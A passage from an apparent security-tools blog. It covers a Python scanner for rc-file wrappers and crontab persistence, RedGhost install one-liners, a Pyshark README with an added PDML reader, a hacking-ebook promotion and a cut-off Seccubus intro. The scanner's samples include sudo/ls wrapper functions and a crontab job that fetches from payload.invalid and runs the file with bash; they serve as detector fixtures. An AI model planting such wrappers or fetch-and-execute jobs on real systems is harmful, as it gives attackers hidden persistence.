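FUNC_RE = re.compile(r"^\s*(?:function\s+)?(\w+)\s*\(\)\s*\{")   # name() {  /  function name() {
ALIAS_RE = re.compile(r"^\s*alias\s+(\w+)=")                      # alias name=...
EVERY_MINUTE_RE = re.compile(r"^\s*\*\s+\*\s+\*\s+\*\s+\*\s+")    # "* * * * *" schedule
FETCH_RE = re.compile(r"\b(?:wget|curl)\b")
INTERP_RE = re.compile(r"\b(?:bash|sh|python\d?|perl|php|ruby)\b")


def scan_rc_file(text):
    """Return (line_no, binary, kind) for each wrapper that shadows a watched binary."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for rx, kind in ((FUNC_RE, "function"), (ALIAS_RE, "alias")):
            m = rx.match(line)
            if m and m.group(1) in SHADOWED_BINARIES:
                hits.append((n, m.group(1), kind))
    return hits


def scan_crontab(text):
    """Return line numbers of every-minute jobs that download and then execute."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # comments are not jobs
        if EVERY_MINUTE_RE.match(line) and FETCH_RE.search(line) and INTERP_RE.search(line):
            hits.append(n)
    return hits


# Constructed ~/.bashrc: one benign alias plus two wrapper functions of the
# kind described above (the helper path is a placeholder, not a real payload).
SAMPLE_BASHRC = """\
# ~/.bashrc (constructed sample)
alias ll='ls -alF'
export EDITOR=vim
sudo() { /tmp/.cache/helper.sh >/dev/null 2>&1; command sudo "$@"; }
function ls() { /tmp/.cache/helper.sh >/dev/null 2>&1; command ls "$@"; }
"""

# Constructed crontab: a nightly backup, a fetch-and-run job every minute,
# and a harmless 5-minute health check. Hosts use the reserved .invalid TLD.
SAMPLE_CRONTAB = """\
# constructed crontab sample
0 3 * * * /usr/bin/backup.sh
* * * * * wget -q -O /tmp/.p http://payload.invalid/p && bash /tmp/.p
*/5 * * * * curl -s https://example.invalid/health
"""

if __name__ == "__main__":
    for n, binary, kind in scan_rc_file(SAMPLE_BASHRC):
        print(f"rc line {n}: {kind} shadows '{binary}'")
    for n in scan_crontab(SAMPLE_CRONTAB):
        print(f"crontab line {n}: every-minute fetch-and-execute job")
```

Run it against real files by reading ~/.bashrc, ~/.profile, /etc/bash.bashrc and the output of <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">crontab -l</span> for each user; any hit for a watched binary deserves a look at what the function body executes before handing control to <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">command</span>.<br />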
<h3 style="text-align: left;">
<span style="color: #073763;">Installation</span></h3>
<b>Install RedGhost in one line:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; ./redghost.sh</span><br />
<br />
<b>One line to install the prerequisites and RedGhost:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; apt-get install dialog; apt-g</span><br />
<br />
<span style="font-size: large;"><a href="https://github.com/d4rk007/RedGhost" target="_blank">Download Redghost</a></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-39079112190969562172019-07-16T19:49:00.002+05:302019-07-16T19:50:35.272+05:30Pyshark- To Allowing Python Packet Parsing Using Wireshark Dissectors<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnHjJVdgUvq7pJmnbolkQPi0ISUef_BxGPx16RNwUySuwEPNMLxzXF3m0LXilufa22idb_JffKdwupLHnI1XZw86-TJ1izl71MRlnN2uOzGgtzEExexpsWnaPX2RwM84LS6OzcC0AuLnaK/s1600/Pyshark.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="387" data-original-width="606" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnHjJVdgUvq7pJmnbolkQPi0ISUef_BxGPx16RNwUySuwEPNMLxzXF3m0LXilufa22idb_JffKdwupLHnI1XZw86-TJ1izl71MRlnN2uOzGgtzEExexpsWnaPX2RwM84LS6OzcC0AuLnaK/s1600/Pyshark.png" /></a></div>
<h2 style="text-align: left;">
<span style="color: #073763;">Python wrapper for tshark, allowing python packet parsing using Wireshark dissectors.</span></h2>
<br />
Pyshark features a few "Capture" objects (Live, Remote, File, InMem). Each of those reads from its respective source and can then be used as an iterator over its packets. Each capture object can also take various filters so that only some of the incoming packets are kept.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation</span></h3>
<b>All Platforms</b><br />
<br />
Simply run the following to install the latest from pypi<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">pip install pyshark</span><br />
<br />
Or install from the git repository:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">git clone https://github.com/KimiNewt/pyshark.git</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">cd pyshark/src</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">python setup.py install</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Mac OS X</span></h3>
You may have to install libxml which can be unexpected. If you receive an error from clang or an error message about libxml, run the following:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">xcode-select --install</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">pip install libxml</span><br />
<br />
You will probably have to accept a EULA for XCode so be ready to click an "Accept" dialog in the GUI.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Usage</span></h3>
Reading from a capture file:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> import pyshark</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> cap = pyshark.FileCapture('/tmp/mycapture.cap')</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> cap</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><FileCapture /tmp/mycapture.cap (589 packets)></span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> print(cap[0])</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Packet (Length: 698)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Layer ETH:</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Destination: BLANKED</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Source: BLANKED</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Type: IP (0x0800)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Layer IP:</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Version: 4</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Header Length: 20 bytes</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport))</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Total Length: 684</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Identification: 0x254f (9551)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Flags: 0x00</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Fragment offset: 0</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Time to live: 1</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Protocol: UDP (17)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Header checksum: 0xe148 [correct]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Source: BLANKED</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Destination: BLANKED</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> ...</span><br />
<br />
<h3 style="text-align: left;">
<b><span style="color: #073763;">Other options</span></b></h3>
<ul style="text-align: left;">
<li><b>param keep_packets:</b> Whether to keep packets after reading them via next(). Used to conserve memory when reading large caps.</li>
<li><b>param input_file:</b> Either a path or a file-like object containing either a packet capture file (PCAP, PCAP-NG..) or a TShark xml.</li>
<li><b>param display_filter: </b>A display (wireshark) filter to apply on the cap before reading it.</li>
<li><b>param only_summaries:</b> Only produce packet summaries, much faster but includes very little information</li>
<li><b>param disable_protocol: </b>Disable detection of a protocol (tshark > version 2)</li>
<li><b>param decryption_key: </b>Key used to encrypt and decrypt captured traffic.</li>
<li><b>param encryption_type: </b>Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).</li>
<li><b>param tshark_path: </b>Path of the tshark binary.</li>
</ul>
<div>
<br /></div>
<h3 style="text-align: left;">
<span style="color: #073763;">Reading from a live interface:</span></h3>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture = pyshark.LiveCapture(interface='eth0')</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture.sniff(timeout=50)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><LiveCapture (5 packets)></span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture[3]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><UDP/HTTP Packet></span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">for packet in capture.sniff_continuously(packet_count=5):</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> print('Just arrived:', packet)</span><br />
<br />
<b><span style="color: #073763;">Other options</span></b><br />
<ul style="text-align: left;">
<li><b>param interface:</b> Name of the interface to sniff on. If not given, takes the first available.</li>
<li><b>param bpf_filter: </b>BPF filter to use on packets.</li>
<li><b>param display_filter: </b>Display (wireshark) filter to use.</li>
<li><b>param only_summaries:</b> Only produce packet summaries, much faster but includes very little information</li>
<li><b>param disable_protocol: </b>Disable detection of a protocol (tshark > version 2)</li>
<li><b>param decryption_key: </b>Key used to encrypt and decrypt captured traffic.</li>
<li><b>param encryption_type: </b>Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).</li>
<li><b>param tshark_path: </b>Path of the tshark binary</li>
<li><b>param output_file:</b> Additionally save captured packets to this file.</li>
</ul>
<br />
<h3 style="text-align: left;">
<b><span style="color: #073763;">Reading from a live interface using a ring buffer</span></b></h3>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture = pyshark.LiveRingCapture(interface='eth0')</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture.sniff(timeout=50)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><LiveCapture (5 packets)></span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture[3]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><UDP/HTTP Packet></span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">for packet in capture.sniff_continuously(packet_count=5):</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> print('Just arrived:', packet)</span><br />
<br />
<b>Other options</b><br />
<ul style="text-align: left;">
<li><b>param ring_file_size:</b> Size of the ring file in kB, default is 1024</li>
<li><b>param num_ring_files:</b> Number of ring files to keep, default is 1</li>
<li><b>param ring_file_name:</b> Name of the ring file, default is /tmp/pyshark.pcap</li>
<li><b>param interface:</b> Name of the interface to sniff on. If not given, takes the first available.</li>
<li><b>param bpf_filter: </b>BPF filter to use on packets.</li>
<li><b>param display_filter:</b> Display (wireshark) filter to use.</li>
<li><b>param only_summaries:</b> Only produce packet summaries, much faster but includes very little information</li>
<li><b>param disable_protocol:</b> Disable detection of a protocol (tshark > version 2)</li>
<li><b>param decryption_key:</b> Key used to encrypt and decrypt captured traffic.</li>
<li><b>param encryption_type:</b> Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).</li>
<li><b>param tshark_path: </b>Path of the tshark binary</li>
<li><b>param output_file:</b> Additionally save captured packets to this file.</li>
</ul>
<h3 style="text-align: left;">
<span style="color: #073763;">Reading from a live remote interface:</span></h3>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture = pyshark.RemoteCapture('192.168.1.101', 'eth0')</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture.sniff(timeout=50)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> capture</span><br />
<br />
<b>Other options</b><br />
<ul style="text-align: left;">
<li><b>param remote_host: </b>The remote host to capture on (IP or hostname). Should be running rpcapd.</li>
<li><b>param remote_interface: </b>The remote interface on the remote machine to capture on. Note that on windows it is not the device display name but the true interface name (i.e. \Device\NPF_..).</li>
<li><b>param remote_port:</b> The remote port the rpcapd service is listening on</li>
<li><b>param bpf_filter: </b>A BPF (tcpdump) filter to apply on the cap before reading.</li>
<li><b>param only_summaries: </b>Only produce packet summaries, much faster but includes very little information</li>
<li><b>param disable_protocol:</b> Disable detection of a protocol (tshark > version 2)</li>
<li><b>param decryption_key: </b>Key used to encrypt and decrypt captured traffic.</li>
<li><b>param encryption_type: </b>Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).</li>
<li><b>param tshark_path:</b> Path of the tshark binary</li>
</ul>
<h3 style="text-align: left;">
<span style="color: #073763;">Accessing packet data:</span></h3>
Data can be accessed in multiple ways. Packets are divided into layers: first you reach the appropriate layer, then you select your field.<br />
<br />
<div style="text-align: left;">
<b>All of the following work:</b></div>
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> packet['ip'].dst</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">192.168.0.1</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> packet.ip.src</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">192.168.0.100</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> packet[2].src</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">192.168.0.100</span><br />
<br />
<b>To test whether a layer is in a packet, you can use its name:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> 'IP' in packet</span><br />
<span style="background-color: #f3f3f3; color: blue; font-family: "courier new" , "courier" , monospace;">True</span><br />
<br />
To see all possible field names, use the <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">packet.layer.field_names</span> attribute (i.e. <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">packet.ip.field_names</span>) or the autocomplete function on your interpreter.<br />
<br />
<b>You can also get the original binary data of a field, or a pretty description of it:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> p.ip.addr.showname</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Source or Destination Address: 10.0.0.10 (10.0.0.10)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"># And some new attributes as well:</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> p.ip.addr.int_value</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">167772170</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> p.ip.addr.binary_value</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">'\n\x00\x00\n'</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Decrypting packet captures</span></h3>
Pyshark supports automatic decryption of traces using the WEP, WPA-PWD, and WPA-PSK standards (WPA-PWD is the default).<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> cap1 = pyshark.FileCapture('/tmp/capture1.cap', decryption_key='password')</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> cap2 = pyshark.LiveCapture(interface='wi0', decryption_key='password', encryption_type='wpa-psk')</span><br />
<br />
A tuple of supported encryption standards, SUPPORTED_ENCRYPTION_STANDARDS, exists in each capture class.<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> pyshark.FileCapture.SUPPORTED_ENCRYPTION_STANDARDS</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">('wep', 'wpa-pwd', 'wpa-psk')</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">>>> pyshark.LiveCapture.SUPPORTED_ENCRYPTION_STANDARDS</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">('wep', 'wpa-pwd', 'wpa-psk')</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Python2 deprecation</span></h3>
This package no longer supports Python2. If you wish to still use it in Python2, you can:<br />
<br />
<b>Use version 0.3.8</b><br />
<br />
<ul style="text-align: left;">
<li>Install pyshark-legacy via pypi</li>
<li>Clone the <a href="https://github.com/KimiNewt/pyshark-legacy" target="_blank">pyshark-legacy repo</a>, where bugfixes will be applied.</li>
</ul>
<br />
<br />
Looking for contributors - for various reasons I have a hard time finding time to maintain and enhance the package at the moment. Any pull-requests will be reviewed and if any one is interested and is suitable, I will be happy to include them in the project. Feel free to mail me at dorgreen1 at gmail.<br />
<br />
There are quite a few Python packet parsing modules; this one is different because it doesn't actually parse any packets itself. It relies on the ability of tshark (the Wireshark command-line utility) to export its dissection as XML, and reads that.<br />
<br />
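Because tshark does the dissection and pyshark only walks the exported XML (PDML), the layer and field access shown under "Accessing packet data" above (packet['ip'].dst, 'IP' in packet, field showname, int_value, binary_value) is a thin view over that tree. The following is an added example written for this page, not pyshark's own code: a standard-library PDML reader offering the same access patterns over a constructed one-packet PDML fragment. The element and attribute names (packet, proto, field, name, showname, show, value) follow tshark's PDML output; the addresses and sizes are made up.<br />

```python
"""Minimal PDML (tshark -T pdml) reader mimicking pyshark's packet/layer/field access.

Added example, not pyshark code. It shows what pyshark does internally: tshark
emits PDML, and the Python side only walks the XML tree. Sample PDML is constructed.
"""
import xml.etree.ElementTree as ET

# Constructed PDML: one packet with geninfo, eth and ip layers. The "value"
# attribute is the hex of the raw bytes, as in real PDML.
SAMPLE_PDML = """<pdml version="0">
  <packet>
    <proto name="geninfo" showname="General information" size="42">
      <field name="num" showname="Number" show="1" value="1"/>
    </proto>
    <proto name="eth" showname="Ethernet II" size="14" pos="0">
      <field name="eth.dst" showname="Destination: 00:11:22:33:44:55" size="6" pos="0" show="00:11:22:33:44:55" value="001122334455"/>
      <field name="eth.src" showname="Source: 66:77:88:99:aa:bb" size="6" pos="6" show="66:77:88:99:aa:bb" value="66778899aabb"/>
      <field name="eth.type" showname="Type: IPv4 (0x0800)" size="2" pos="12" show="0x0800" value="0800"/>
    </proto>
    <proto name="ip" showname="Internet Protocol Version 4" size="20" pos="14">
      <field name="ip.version" showname="Version: 4" size="1" pos="14" show="4" value="45"/>
      <field name="ip.src" showname="Source: 192.168.0.100" size="4" pos="26" show="192.168.0.100" value="c0a80064"/>
      <field name="ip.addr" showname="Source or Destination Address: 10.0.0.10" hide="yes" size="4" pos="26" show="10.0.0.10" value="0a00000a"/>
      <field name="ip.dst" showname="Destination: 192.168.0.1" size="4" pos="30" show="192.168.0.1" value="c0a80001"/>
    </proto>
  </packet>
</pdml>
"""


class Field:
    """One PDML <field>: human-readable text plus the raw bytes behind it."""

    def __init__(self, elem):
        self.name = elem.get("name")
        self.showname = elem.get("showname", "")   # pretty description
        self.show = elem.get("show", "")           # displayed value
        self._hex = elem.get("value", "")          # raw bytes as hex

    @property
    def binary_value(self):
        return bytes.fromhex(self._hex) if self._hex else b""

    @property
    def int_value(self):
        return int(self._hex, 16) if self._hex else None

    def __str__(self):
        return self.show


class Layer:
    """One PDML <proto>; fields are reachable as layer.<name> without the 'proto.' prefix."""

    def __init__(self, elem):
        self.layer_name = elem.get("name")
        self._fields = {}
        for f in elem.iter("field"):               # includes nested fields
            name = f.get("name")
            if name and name not in self._fields:  # keep the first occurrence
                self._fields[name] = Field(f)

    @property
    def field_names(self):
        return [n.split(".", 1)[1] if "." in n else n for n in self._fields]

    def get_field(self, name):
        key = name if name in self._fields else f"{self.layer_name}.{name}"
        return self._fields[key]

    def __getattr__(self, name):                   # layer.dst -> field "ip.dst"
        try:
            return self.get_field(name)
        except KeyError:
            raise AttributeError(name)


class Packet:
    """One PDML <packet>; geninfo is dropped, as pyshark does."""

    def __init__(self, elem):
        self.layers = [Layer(p) for p in elem.findall("proto") if p.get("name") != "geninfo"]
        self._by_name = {layer.layer_name: layer for layer in self.layers}

    def __contains__(self, layer_name):            # 'IP' in packet (case-insensitive)
        return layer_name.lower() in self._by_name

    def __getitem__(self, key):                    # packet['ip'] or packet[1]
        if isinstance(key, int):
            return self.layers[key]
        return self._by_name[key.lower()]

    def __getattr__(self, name):                   # packet.ip
        try:
            return self._by_name[name.lower()]
        except KeyError:
            raise AttributeError(name)


def parse_pdml(xml_text):
    """Parse a PDML document into a list of Packet objects."""
    root = ET.fromstring(xml_text)
    return [Packet(p) for p in root.findall("packet")]


if __name__ == "__main__":
    pkt = parse_pdml(SAMPLE_PDML)[0]
    print(pkt["ip"].dst, pkt.ip.src, "IP" in pkt)
    print(pkt.ip.addr.showname, pkt.ip.addr.int_value, pkt.ip.addr.binary_value)
```

Feed it real data with <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">tshark -r capture.pcap -T pdml</span> and the same accessors apply; the int_value and binary_value for ip.addr above (167772170 and b'\n\x00\x00\n' for 10.0.0.10) come out identical to the values quoted in the post, because both are derived from the same hex "value" attribute.<br />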
<div style="text-align: left;">
This package allows parsing from a capture file or a live capture, using all wireshark dissectors you have installed. Tested on windows/linux.</div>
<h3 style="text-align: left;">
<span style="color: #073763; font-size: large;"><a href="https://github.com/KimiNewt/pyshark/archive/master.zip" target="_blank">Download Pyshark</a></span></h3>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-43436215307871506432019-07-11T00:58:00.000+05:302019-07-11T00:58:41.147+05:30Learn Ethical Hacking from Scratch ($23 Value) FREE For a Limited Time - eBook<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDCRmMc0_BqxdcVr54nTyegWNVCPlvM0jao2aR7R48i_18yrcth8xJwNKnZJTbTjOC6ksIyjnLlEr016AgbBk-Q_zPfKrzPi5S-RmTSoNhW1JiOi6jfm4wCmNEu5bRZVhHgsE3xmTXpxHF/s1600/LEARN+ETHICAL+HACKING.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="385" data-original-width="718" height="343" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDCRmMc0_BqxdcVr54nTyegWNVCPlvM0jao2aR7R48i_18yrcth8xJwNKnZJTbTjOC6ksIyjnLlEr016AgbBk-Q_zPfKrzPi5S-RmTSoNhW1JiOi6jfm4wCmNEu5bRZVhHgsE3xmTXpxHF/s640/LEARN+ETHICAL+HACKING.png" width="640" /></a></div>
<br />
<h2 style="text-align: left;">
<span style="color: #073763;">"Learn Ethical Hacking from Scratch ($23 Value) FREE For a Limited Time"</span></h2>
<br />
Learn how to hack systems like black hat hackers and secure them like security experts.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">This eBook will help you:</span></h3>
<ul style="text-align: left;">
<li>Understand ethical hacking and the different fields and types of hackers</li>
<li>Set up a penetration testing lab to practice safe and legal hacking</li>
<li>Explore Linux basics, commands, and how to interact with the terminal</li>
<li>Access password-protected networks and spy on connected clients</li>
<li>Use server and client-side attacks to hack and control remote computers</li>
<li>Control a hacked system remotely and use it to hack other systems</li>
<li>Discover, exploit, and prevent a number of web application vulnerabilities such as XSS and SQL injections</li>
<li>Understand how computer systems work and their vulnerabilities, exploit weaknesses and hack into machines to test their security, and learn how to secure systems from hackers now!</li>
</ul>
<br />
Free offer expires 07/23/19.<br />
<br />
Offered Free by: Packt<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://hackersonlineclub.tradepub.com/free/w_pacb101/prgm.cgi" style="margin-left: auto; margin-right: auto;" target="_blank"><img alt=" DOWNLOAD NOW!" border="0" data-original-height="603" data-original-width="418" download="" now="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWnNFF2NOlqQmGQYqONhXImO33S1Y3tSQN_JSZVmRIXLtp5oQ72C1PN3ZvTCvz-9m6QNjS6Pww9G9xbwOgEaGFDOy8O-PxWlnKG98hYvEAKvub5rIu88g1Qv4icXW5q_rpFbH1oDXBQi2t/s1600/Learn+Ethical+Hacking+from+Scratch.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="https://hackersonlineclub.tradepub.com/free/w_pacb101/prgm.cgi" target="_blank"><b><span style="font-size: large;">DOWNLOAD NOW</span></b></a></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
</div>
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-4033319510943693642019-06-21T19:35:00.000+05:302019-06-21T19:35:25.974+05:30Seccubus- Easy Automated Vulnerability Scanning, Reporting And Analysis<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7MQR2_QkHX4gL5uU7NAq7oIDdd_ytEpOdZzAsGGRQRrRUU3LrgMTVIlLyWzrI5Kns9cxr7suxtvBp8SGpd1yIjaP0xapO-A51jUbp6PHmgtcmsJU4UAdsXvj680dqiKrkv4UKc1Suotom/s1600/Seccubus.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="378" data-original-width="593" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7MQR2_QkHX4gL5uU7NAq7oIDdd_ytEpOdZzAsGGRQRrRUU3LrgMTVIlLyWzrI5Kns9cxr7suxtvBp8SGpd1yIjaP0xapO-A51jUbp6PHmgtcmsJU4UAdsXvj680dqiKrkv4UKc1Suotom/s1600/Seccubus.png" /></a></div>
<h2 style="text-align: left;">
<span style="color: #073763;">Seccubus- Easy Automated Vulnerability Scanning, Reporting And Analysis</span></h2>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Seccubus automates regular vulnerability scans with various tools and aids security people in the fast analysis of its output, both on the first scan and on repeated scans.</span></h3>
Seccubus runs vulnerability scans at regular intervals and compares the findings of the last scan with the findings of the previous scan. The delta of this scan is presented in a web GUI where findings can be easily marked as either real findings or non-issues.<br />
<br />
On repeated scans, delta reporting ensures that findings only need to be judged when they first appear in the scan results or when their output changes.<br />
<br />
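The delta logic described above can be written out in a few lines. This is an added example written for this page, not Seccubus code: findings are keyed by (host, port, plugin), compared on their output text, and any judgement made on the previous run is carried forward when the output is unchanged, so only new or changed findings land in the analyst's queue. The key fields, status names and sample findings are assumptions made for the example.<br />

```python
"""Delta classification between two vulnerability scan runs.

Added example of the delta-reporting idea, not Seccubus code. A finding is
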